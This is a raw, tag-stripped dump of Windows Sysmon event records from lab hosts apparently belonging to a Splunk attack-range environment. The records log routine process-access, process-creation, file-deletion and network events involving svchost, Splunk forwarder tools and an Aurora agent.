12:18:33.044{FE4C2B44-D9F5-63C7-0C00-00000000AF02}832772C:\Windows\system32\svchost.exe{FE4C2B44-DA03-63C7-2000-00000000AF02}2452C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000040730Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:18:33.044{FE4C2B44-D9F5-63C7-0C00-00000000AF02}832772C:\Windows\system32\svchost.exe{FE4C2B44-DA03-63C7-2000-00000000AF02}2452C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000040729Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:18:33.044{FE4C2B44-D9F3-63C7-0500-00000000AF02}4082524C:\Windows\system32\csrss.exe{FE4C2B44-E399-63C7-1006-00000000AF02}6424C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000040728Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:18:33.044{FE4C2B44-DA67-63C7-AA00-00000000AF02}20924876C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{FE4C2B44-E399-63C7-1006-00000000AF02}6424C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7424|C:\Windows\System32\KERNELBASE.dll+24890|C:\Windows\System32\KERNELBASE.dll+22e56|C:\Windows\System32\KERNEL32.DLL+1c373|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+e499f1|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1b3255|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bd30d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1b59b6|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd3c14|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bd79a|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1c0f1c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd07d2|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd491d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bb965|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dc694e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x800000000000000040727Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:18:33.045{FE4C2B44-E399-63C7-1006-00000000AF02}6424C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe8.2.5Registry monitorsplunk ApplicationSplunk Inc.splunk-regmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{FE4C2B44-D9F3-63C7-E703-000000000000}0x3e70SystemMD5=C8BED8D054FDE4C4222F39C750539874,SHA256=765D1E768D7027343C681DF3B2F6113ED0337F7179CDAE9CF89979A8725CE490,IMPHASH=5DCBAD7446F97D73DA1DA121D8CD8778{FE4C2B44-DA67-63C7-AA00-00000000AF02}2092C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x800000000000000040726Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:18:33.013{FE4C2B44-DA75-63C7-F400-00000000AF02}2900NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8F3BE6FFC4D2A1B37B537D5DBC1DC821,SHA256=0D2C16F0B9D231189BF15CE8C0173992C830F82981EA6FE3B8FDC98B639736A5,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000015587Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:18:32.968{E5A8D418-DCC7-63C7-D000-00000000B002}3144C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-ctus-attack-range-933.us-east-2.compute.internal50055-false10.0.1.12ip-10-0-1-12.us-east-2.compute.internal8000- 23542300x800000000000000015586Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:18:34.898{E5A8D418-DCCE-63C7-EB00-00000000B002}3756NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C26C6635F5E91851156D3F2508634441,SHA256=C042EA3FE7AB5AE8844805B0CD1478B402D4AED3F084BB7256BA3DD35464C1AD,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000015585Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:18:34.395{E5A8D418-DCC0-63C7-A300-00000000B002}9683180C:\Windows\system32\conhost.exe{E5A8D418-E39A-63C7-ED01-00000000B002}376C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000015584Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:18:34.395{E5A8D418-DC43-63C7-0C00-00000000B002}7283236C:\Windows\system32\svchost.exe{E5A8D418-DC44-63C7-1F00-00000000B002}1284C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000015583Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:18:34.395{E5A8D418-DC43-63C7-0C00-00000000B002}7283236C:\Windows\system32\svchost.exe{E5A8D418-DC44-63C7-1F00-00000000B002}1284C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000015582Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:18:34.395{E5A8D418-DC43-63C7-0C00-00000000B002}7283236C:\Windows\system32\svchost.exe{E5A8D418-DC44-63C7-1F00-00000000B002}1284C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000015581Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:18:34.395{E5A8D418-DC43-63C7-0C00-00000000B002}7283236C:\Windows\system32\svchost.exe{E5A8D418-DC44-63C7-1F00-00000000B002}1284C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000015580Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:18:34.395{E5A8D418-DC43-63C7-0C00-00000000B002}7283236C:\Windows\system32\svchost.exe{E5A8D418-DC44-63C7-1F00-00000000B002}1284C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000015579Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:18:34.395{E5A8D418-DC43-63C7-0C00-00000000B002}7283236C:\Windows\system32\svchost.exe{E5A8D418-DC44-63C7-1F00-00000000B002}1284C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000015578Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:18:34.395{E5A8D418-DC43-63C7-0C00-00000000B002}7283236C:\Windows\system32\svchost.exe{E5A8D418-DC44-63C7-1F00-00000000B002}1284C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000015577Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:18:34.395{E5A8D418-DC43-63C7-0C00-00000000B002}7283236C:\Windows\system32\svchost.exe{E5A8D418-DC44-63C7-1F00-00000000B002}1284C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000015576Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:18:34.395{E5A8D418-DC43-63C7-0C00-00000000B002}7283236C:\Windows\system32\svchost.exe{E5A8D418-DC44-63C7-1F00-00000000B002}1284C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000015575Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:18:34.395{E5A8D418-DC43-63C7-0500-00000000B002}4163684C:\Windows\system32\csrss.exe{E5A8D418-E39A-63C7-ED01-00000000B002}376C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000015574Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:18:34.395{E5A8D418-DCC0-63C7-9F00-00000000B002}30963280C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{E5A8D418-E39A-63C7-ED01-00000000B002}376C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7424|C:\Windows\System32\KERNELBASE.dll+24890|C:\Windows\System32\KERNELBASE.dll+22e56|C:\Windows\System32\KERNEL32.DLL+1c373|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+e499f1|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1b3255|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bd30d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1b59b6|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd3c14|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bd79a|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1c0f1c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd07d2|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd491d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bb965|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dc694e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x800000000000000015573Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:18:34.396{E5A8D418-E39A-63C7-ED01-00000000B002}376C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe8.2.5Windows Print Monitor splunk ApplicationSplunk Inc.splunk-winprintmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{E5A8D418-DC43-63C7-E703-000000000000}0x3e70SystemMD5=40AB9FBBAEDDA47FD9B0A2EC5E183B97,SHA256=8A7CB60452D38C258714CE37C2C490E78007A9E4F4F9A94B270BDBA59FA8F1AE,IMPHASH=35240A25EDE7EC5A65BF627E57E772B9{E5A8D418-DCC0-63C7-9F00-00000000B002}3096C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x800000000000000040767Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:18:34.829{FE4C2B44-DE08-63C7-F104-00000000AF02}60686500C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-E326-63C7-F905-00000000AF02}3260C:\Program Files (x86)\Foxit Software\Foxit PDF Reader\FoxitPDFReader.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000019CC5A50) 10341000x800000000000000040766Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:18:34.828{FE4C2B44-DE08-63C7-F104-00000000AF02}60686500C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-E317-63C7-ED05-00000000AF02}6268C:\Program Files (x86)\Foxit Software\Foxit PDF Reader\FoxitPDFReaderUpdateService.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000019CC5A50) 10341000x800000000000000040765Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:18:34.827{FE4C2B44-DE08-63C7-F104-00000000AF02}60686500C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-E0D1-63C7-5E05-00000000AF02}5280C:\Windows\system32\conhost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000019CC5A50) 10341000x800000000000000040764Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:18:34.827{FE4C2B44-DE08-63C7-F104-00000000AF02}60686500C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-E0D1-63C7-5D05-00000000AF02}4176C:\Windows\system32\cmd.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000019CC5A50) 10341000x800000000000000040763Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:18:34.825{FE4C2B44-DE08-63C7-F104-00000000AF02}60686500C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-E02A-63C7-4705-00000000AF02}4708C:\Windows\system32\wbem\wmiprvse.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000019CC5A50) 10341000x800000000000000040762Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:18:34.819{FE4C2B44-DE08-63C7-F104-00000000AF02}60686500C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DE09-63C7-F204-00000000AF02}5228C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000019CC5A50) 10341000x800000000000000040761Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:18:34.806{FE4C2B44-DE08-63C7-F104-00000000AF02}60686500C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DE08-63C7-EF04-00000000AF02}6056C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000019CC5A50) 10341000x800000000000000040760Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:18:34.778{FE4C2B44-DE08-63C7-F104-00000000AF02}60686500C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DDF9-63C7-C404-00000000AF02}5200C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000019CC5A50) 10341000x800000000000000040759Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 